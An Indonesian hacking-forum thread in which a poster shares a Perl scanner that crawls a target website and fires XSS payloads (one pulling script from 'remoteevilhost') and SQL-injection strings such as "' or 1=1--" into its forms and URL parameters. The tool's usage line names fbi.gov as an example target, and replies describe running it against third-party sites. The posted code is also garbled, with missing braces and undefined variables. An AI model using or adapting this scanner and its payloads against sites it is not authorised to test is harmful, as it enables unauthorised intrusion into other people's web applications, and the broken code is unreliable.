Assalamualaikum All Big Grin ketemu lg sama orang ganteng xsan-lahci
wkwkwk ane mo share nih cara lain mencari bugs xss dan sqli sampai di kasih tau letak vulnernya pd site target Big Grin okeh langsung paste aja nih c0dinganya di bawah ini




#By skvoznoy and profit.

#greetz to ven000m,?erabyte,Benny_29a,Zadoxlik,payhash

#Zaco,YooogI,gema,?erm,xspider, KEZ, SkyOut



#?????????? ??? Get ????????


@buglist = ("%00","%2527%252esasdf","?",

"??","/","../","./..././","/%2e/", "%2e","%5C","%s", "'","'''''","\"",

"%%%%%%","!!!!!!!!!!!!!!!!!!","#", "%5C27","%%5C%56" , "\'", "\\",';',";a", "|",

"\?>", "%a0");

@IMPROPERCOMMONFILTERING = ("<b>warning</b>:", "warning:", "<b>fatal error</b>", "failed

to open stream:", "internal server error", "there was an error when processing

this directive.", "http/1.1 400", "http/1.1 403", "http/1.1 500", "gateway

error", "command not found", "file not found");


#XSS ??????????


@XSSbugs = ("<script>alert('XSS')</script>","'';!--\"<XSS>=&{()}","<IMG SRC=\"javascript:alert('XSS');\">","<IMG SRC=javascript:alert(&quot;XSS&quot;)>","<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>","<IMG SRC=javascript:alert('XSS')>","<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>","<SCRIPT/XSS SRC=\"http://remoteevilhost/xss.js\"></SCRIPT>","<IMG SRC=\"javascript:alert('XSS')\"","<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">","<IMG SRC='vbscript:msgbox(\"XSS\")'>","<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">","<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">","<body onload=\"javascript:alert('XSS')\"></body>","<table background=\"javascript:alert('XSS')\"></table>","%22%2Balert(%27XSS%27)%2B%22",">\"'><script>alert('XSS')</script>");

@IMPROPERXSSFILTERING = ("<script> *alert\\('XSS'\\) *<\/script>","<XSS>","<IMG SRC=\"javascript:alert\\('XSS'\\);\">","<IMG SRC=javascript:alert\\(&quot;XSS&quot;\\)>","<IMG SRC=javascript:alert\\(String.fromCharCode\\(88,83,83\\)\\)>","<IMG SRC=javascript:alert('XSS')>","<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>","<SCRIPT/XSS SRC=\"http://remoteevilhost/xss.js\"><\/SCRIPT>","<IMG SRC=\"javascript:alert\\('XSS'\\)\"","<LINK REL=\"stylesheet\" HREF=\"javascript:alert\\('XSS'\\);\">","<IMG SRC='vbscript:msgbox\\(\"XSS\"\\)'>","<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert\\('XSS'\\);\">","<DIV STYLE=\"background-image: url\\(javascript:alert\\('XSS'\\)\\)\">","<body onload=\"javascript:alert\\('XSS'\\)\"></body>","table background=\"javascript:alert\\('XSS'\\)\"></table>",">\"'><script>alert\\('XSS'\\)</script>");


#SQL ????????


@SQLbugs = ("' or 1=1--","\" or 1=1--","or 1=1--","' or 'a'='a","\" or \"a\"=\"a","" or \"a\"=\"a","' OR 1=1","\" OR 1=1"," OR 1=1","or 0=0 #"," or 0=0 #","or 0=0 #");

@IMPROPERSQLFILTERING = ("\\[obdc", "mysql error", "you have an error in your sqlsyntax", "odbc drivers error", "\\[microsoft sql");




@begintag = ("<IMG SRC=\"","<LINK REL=\"stylesheet\" HREF=\"","<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=","<DIV STYLE=\"background-image: url(","<body onload=\"","<table background=\"");

@endtag = ("\">","\">","\">",")\">","\"></body>","\"></table>");

@payload = ("javascript:alert('XSS')","javascript:alert(&quot;XSS&quot;)","javascript:alert(String.fromCharCode(88,83,83))","javascript:javascript:alert('XSS')","javascript:&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041");

@tagregex = ("<IMG SRC","<LINK REL=\"stylesheet\" HREF=\"","<META HTTP-EQUIV=","<DIV STYLE=\"background-image: url","<body onload=","<table background=");

@payloadregex= ("javascript:alert\\('XSS'\\)","javascript:alert\\(&quot;XSS&quot;\\)","javascript:alert\\(String.fromCharCode\\(88,83,83\\)\\)","javascript:javascript:alert('XSS')","javascript:&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041");


use HTTP::Request::Common;

use LWP::UserAgent;

$ua = LWP::UserAgent->new;

sub URLcode {

    my $theURL=$_[0];

    $theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg;

    return $theURL;


sub f_Analyze


$targeturl = $_[0];

$content = $ua->request(GET $targeturl);

$content = $content->content();

@cont = split(/\n/,$content); #split as independant lines

$formfound = 0;

print "[@]????? ??????????? $targeturl\n";

foreach $LINE (@cont)


  if ($LINE =~/<form/i)



    $formfound = 1;

    $LINE =~/action *= *"(.+?)"/i;

    $formaction = $1;

    $LINE =~/method *= *"(.+?)"/i;

    $formmethod = $1;


  if (($LINE =~/<input/i) && ($formfound))


    $LINE =~/ type *= *"(.+?)"/i;


    $LINE =~/ name *= *"(.+?)"/i;


    $LINE =~/ value *= *"(.+?)"/i;  



  if (($LINE =~/<\/form/i) && ($formfound))


print "[+]????????????:\n";

print "????????: $formaction ($formmethod)\n";

print "??????????:\n";

for ($yu = 0; $yu < @forminputs; $yu++)


  print "[=]Name: $forminputs[$yu];Type: $formtypes[$yu];Value: $formvalues[$yu];\n";


    $formfound = 0;

    for ($f = 0; $f < @XSSbugs; $f++)


      for ($i = 0; $i < @forminputs; $i++)


        print "[.]XSS ???????? $forminputs[$i] ($f / $#XSSbugs)";

        print "[$XSS bugs scan[$f]]" if ($verbose);  

        print "\n";

        push(@formdata,$forminputs[$i] => $XSSbugs[$f]);

        if ($i > 0)


          for ($koe = 0; $koe < $i; $koe++)


            push(@formdata,$forminputs[$koe] => $formvalues[$koe]);



        if ($i < @forminputs)


          for ($koe = ($i+1); $koe < @forminputs; $koe++)


            push(@formdata,$forminputs[$koe] => $formvalues[$koe]);



      if ($formmethod == /POST/i)


        $response = $ua->request(POST $targeturl,\@formdata);        




        $response = $ua->request(GET $targeturl,\@formdata);        


      $response = $response->content();

      @formdata = ();      

      for ($z = 0; $z < @IMPROPERXSSFILTERING; $z++)


        if ($response =~ m/$IMPROPERXSSFILTERING[$z]/i)


          print "[!]XSS ??????????: $XSSbugs[$f]\n";







     for ($o = 0; $o < @payload; $o++)


      for ($c = 0; $c < 2; $c++)


      for ($a = 0; $a < @begintag; $a++)


        $injection = $begintag[$a].$payload[$o].$endtag[$a];

            if ($c == 1)


              $injection = ">\"'>".$injection;


            if ($c == 2)


              $injection = ">%22%27>".$injection;  


            for ($i = 0; $i < $inputcount; $i++)


             push(@formdata,$forminputs[$i] => $injection);

             print "[.]XSS-fuzz testing $forminputs[$i] ($o ($a / $#begintag) / $#payload)";

             print "[$injection]" if ($verbose);

             print "\n";

             if ($i > 0)


               for ($w = 0; $w < $i; $w++)


                 push(@formdata,$forminputs[$w] => $formvalues[$w]);



             if ($i < $inputcount)


               for ($z = ($i+1); $z < $inputcount; $z++)


                 push(@formdata,$forminputs[$z] => $formvalues[$z]);                



      if ($formmethod == /POST/i)


        $response = $ua->request(POST $targeturl,\@formdata);        




        $response = $ua->request(GET $targeturl,\@formdata);        


      $response = $response->content();

      @formdata = ();  

      if (($response =~ /$tagregex[$a]/) && ($response =~ /$payloadregex[$o]/))


        print "[!]?????????? XSS $injection\n";






     for ($f = 0; $f < @SQLbugs; $f++)


       for ($i = 0; $i < $inputcount; $i++)


          print "[.]SQL bugs scan $forminputs[$i] ($f / $#SQLTRICKS)";

          print "[$SQL[$f]]" if ($verbose);

          print "\n";

          push(@formdata,$forminputs[$i] => $SQLTRICKS[$f]);

          if ($i > 0)


            for ($h = 0; $h < $i; $h++)


            push(@formdata,$forminputs[$h] => $formvalues[$h]);



          if ($i < $inputcount)


            for ($h = ($i+1); $h < $inputcount; $h++)


            push(@formdata,$forminputs[$h] => $formvalues[$h]);



      if ($formmethod == /POST/i)


        $response = $ua->request(POST $targeturl,\@formdata);        




        $response = $ua->request(GET $targeturl,\@formdata);        


      $response = $response->content();

      @formdata = ();

      for ($z = 0; $z < @IMPROPERSQLFILTERING; $z++)


        if ($response =~ m/$IMPROPERSQLFILTERING[$z]/i)


          print "[!]?????????? SQL: $SQLTRICKS[$f] \n";





    $formmethod = '';

    $formaction = '';

    @forminputs = ();

    @formtypes = ();

    @formdata = ();




sub Analyzeurl


$targeturl = $_[0];

if ($targeturl =~ /(.+)\?(.+)/)


  $baseurl = $1;

  $resturl = $2;  

  print "[@]???????????? GET ???????? $targeturl\n";

  while (index($resturl,"&") > -1)


     $curind = index($resturl,"&")+1;


     $resturl = substr($resturl,$curind,length($resturl));          



  for ($i = 0; $i < @getvariables; $i++)


    ($variablename,$defaultvalue) = split(/=/,$getvariables[$i]);









     for ($o = 0; $o < @payload; $o++)


      for ($c = 0; $c < 2; $c++)


      for ($a = 0; $a < @begintag; $a++)


        $injection = $begintag[$a].$payload[$o].$endtag[$a];

            if ($c == 1)


              $injection = ">\"'>".$injection;


            if ($c == 2)


              $injection = ">%22%27>".$injection;  


  for ($i = 0; $i < @getvarnames; $i++)


   for ($l = 0; $l < 1; $l++)


     if ($l)


      $evilvalue = URLcode($injection);




      $evilvalue = $injection;


     $constructedurl = $baseurl."?".$getvarnames[$i]."=".$evilvalue;

     print "[.]XSS scan $getvarnames[$i] ($o ($a / $#begintag) / $#payload)\n";

     if ($i > 0)


       for ($f = 0; $f < $i; $f++)


         $constructedurl .= "&".$getvarnames[$f]."=".$getvarvals[$f];



     if ($i < @getvarnames)


       for ($f = ($i+1); $f < @getvarnames; $f++)


         $constructedurl .= "&".$getvarnames[$f]."=".$getvarvals[$f];



     $response = $ua->request(GET $constructedurl);

     $response = $response->content();        

       if (($response =~ /$tagregex[$a]/) && ($response =~ /$payloadregex[$o]/))


        print "[!]?????????? $evilvalue ? $getvarnames[$i]\n";







  for ($i = 0; $i < @getvarnames; $i++)


  for ($y = 0; $y < 2; $y++)


   if ($y == 0)


     @CURRENTVLNS = @XSSbugs;



   elsif ($y == 1)


     @CURRENTVLNS = @SQLbugs;



   elsif ($y == 2)


   @CURRENTVLNS = @buglist;



   for ($l = 0; $l < 1; $l++)


    for ($x = 0; $x < @CURRENTVLNS; $x++)


     if ($l)


      $evilvalue = URLcode($CURRENTVLNS[$x]);




      $evilvalue = $CURRENTVLNS[$x];


     $constructedurl = $baseurl."?".$getvarnames[$i]."=".$evilvalue;

     print "[.]Testing $getvarnames[$i] ($x / $#CURRENTVLNS)\n";

     if ($i > 0)


       for ($f = 0; $f < $i; $f++)


         $constructedurl .= "&".$getvarnames[$f]."=".$getvarvals[$f];



     if ($i < @getvarnames)


       for ($f = ($i+1); $f < @getvarnames; $f++)


         $constructedurl .= "&".$getvarnames[$f]."=".$getvarvals[$f];



     $response = $ua->request(GET $constructedurl);

     $response = $response->content();

     if ($y == 0)


        if ($response =~ m/$IF[$x]/i)


          print "[!]?????????? XSS $evilvalue ? $getvarnames[$i] (Urlencoding: $l)\n";        





      for ($z = 0; $z < @IF; $z++)


        if ($response =~ m/$IF[$z]/i)


          print "[!]??????????: $evilvalue ? $getvarnames[$i]; (Urlencoding: $l)\n";        









sub Spider


$baseurl = $_[0];

$dir = $_[1];

$page = $_[2];

$targeturl = $baseurl.$dir.$page;

$response = $ua->request(GET $targeturl);

$response = $response->content();

@cont = split(/\n/,$response); #split as independant lines

print "[@]Spidering $targeturl\n";

push (@spideredlinks,$targeturl);



foreach $LINE (@cont)


  if ($LINE =~ /<a +href *= *"(.+?)"/i) #<A HREF> LINKS


    $linkie = $1;

    if (($linkie ne "#") && ($linkie !~ /https*:\/\//))


      print "[&]$linkie (from $targeturl)\n";

      if ($linkie =~ /\//)


          $dir = substr($linkie,0,rindex($linkie,"/")+1);

          $page = substr($linkie,rindex($linkie,"/")+1,length($linkie));

          $dir = "/".$dir if ($dir[0] ne "/");




       elsif ($linkie ne $page)


           $already = 0; #don't spider links we already visited

           for ($y = 0; $y < @spideredlinks; $y++)


              $already = 1 if ($baseurl.$dir.$linkie eq $spideredlinks[$y]);


           Spider($baseurl,$dir,$linkie) if (!$already);







sub Usage


  print "Jane-Jane\n";

  print "Version: 0.0.1\n";

  print "by skvoznoy and profit\n";

  print "How to start: jane.pl <server> <directory> <page> <anything for verbose> (optional)\n";

  print "Eg: perl jane.pl http://www.fbi.gov / index.php -v\n";



$verbose = 0;

Usage if (@ARGV < 3);

$verbose = 1 if (@ARGV == 4);

print "????? ??????????? '$ARGV[0]$ARGV[1]$ARGV[2]'...\n ??? ?????? ??????? ??????? ;)\n";


save aja terserah ente namanya apa tapi formatnya .pl karena di buat dr pemrograman perl

bisa juga paste dr pastebin ane

oke cara pakenya tinggal gini om
Quote:xsan-lahci@ibt:~# perl Xss_SQL_Scan.pl
Version: 0.0.1
by skvoznoy and profit
How to start: Xss_SQL_Scan.pl <server> <directory> <page> <anything for verbose> (optional)
Eg: perl Xss_SQL_Scan.pl http://www.fbi.gov / index.php -v

xsan-lahci@ibt:~# perl Xss_SQL_Scan.pl http://target.ac.id / index.php -v

kalo si target vuln maka bakal di kasih nih vulnya dimana kaya di SS berikut

[Image: 582135_258311277617640_238285082_n.jpg]

okeh semoga membantu happy ganteng wkwkwk

ijin coba
kalo gagal minus 1 ya
ahaha Tongue
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

wkwkwk kl gagal targetnta ga vuln om Smile

(07-21-2012, 11:27 PM)wine trochanter Wrote: ijin coba
kalo gagal minus 1 ya
ahaha Tongue

Wah kalo yang coba pada gagal
bnyak nih yang dapet minus 1
wkwkw Confused

99% [=====================================> ] 325,748,506 46.2K/s eta 75s

ane coba kok xss mulu om
emang lama ya om ?

kalau hasilnya
mailto:xxxxxxx.com (from:xxxx.com )
itu kenapa om ?

macet disini, lamaaa...:
[=]Name: __EVENTVALIDATION;Type: hidden;Value: /wEWAgLO7vDcAgKaiuIt1C6GSoZiMlJ+g0l00MErmzRorW4=;
[=]Name: ctl00$bilingual$hdn;Type: hidden;Value: 0;
[=]Name: __spDummyText1;Type: text;Value: __spDummyText1;
[=]Name: __spDummyText2;Type: text;Value: __spDummyText2;
[.]XSS ???????? __SPSCEditMenu (0 / 16)[ bugs scan[0]]

jadi -1 ga nih? hahaha Tongue

tp sebelumnya +1 dulu lah Big Grin

bahaha kok pada nyangkut ya Smile ane lancar alhamdulillah hmm mungkin karena faktor wajah ane yg gantenghehehe

mantab om,udah ane test berhasil. Smile

(07-22-2012, 07:54 PM)xsan-lahci Wrote: bahaha kok pada nyangkut ya Smile ane lancar alhamdulillah hmm mungkin karena faktor wajah ane yg gantenghehehe

wah makasih uebaaat oooi...ane coba scan di ANDROID butut ane mayan jg tuh dpt hsl nya.

Sorry cuman bisa skrin suit nya ini aje...



maaf maaf kl hslnya tdk maksimal, maklum scan nya jg lewat android ..yachh...tdk maksimal lah hsl nya Big Grin

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